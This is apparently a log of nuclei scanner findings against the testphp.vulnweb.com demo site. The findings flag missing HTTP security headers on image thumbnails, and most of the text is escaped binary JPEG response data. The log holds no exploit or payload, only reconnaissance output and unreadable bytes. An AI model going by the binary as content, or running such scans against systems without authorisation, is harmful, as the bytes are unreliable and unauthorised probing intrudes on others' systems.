\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:20.403726231Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\